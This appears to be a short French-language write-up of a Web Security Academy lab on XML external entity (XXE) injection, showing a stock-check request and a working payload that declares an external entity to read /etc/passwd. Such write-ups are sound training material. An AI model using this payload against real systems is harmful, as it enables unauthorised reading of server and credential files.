XXE pour lire des fichiers avec des entités externes

Exploiting XXE using external entities to retrieve files

Lab: Exploiting XXE using external entities to retrieve files | Web Security AcademyWebSecAcademy

Exploiter une vulnérabilité XXE en déclarant une entité externe pour récupérer le contenu d’un fichier (ici /etc/passwd) à partir de la fonctionnalité Check stock qui parse du XML et renvoie les valeurs inattendues.

La fonctionnalité envoie du XML comme ceci :

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
  <productId>
  2
  </productId>
<storeId>
  1
  </storeId>
</stockCheck>

Si on remplace la valeur numérique de <productId> par une chaîne, cette valeur est reflétée dans la réponse (utile pour l’exploitation) :

<productId>
test
</productId>

Déclarer une entité externe dans une déclaration DOCTYPE qui pointe sur le fichier système.

<!DOCTYPE foo [<!ENTITY myFile SYSTEM "file:///etc/passwd">]>

Appeler cette entité dans le champ <productId> qui est renvoyé par l’application.

&myFile;

La réponse devrait alors contenir le contenu du fichier ciblé (/etc/passwd).

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY myFile SYSTEM "file:///etc/passwd">]>
<stockCheck>
  <productId>
  &myFile;
  </productId>
<storeId>
  1
  </storeId>
</stockCheck>

Mis à jour il y a 3 mois

hashtagExploiting XXE using external entities to retrieve files

Exploiting XXE using external entities to retrieve files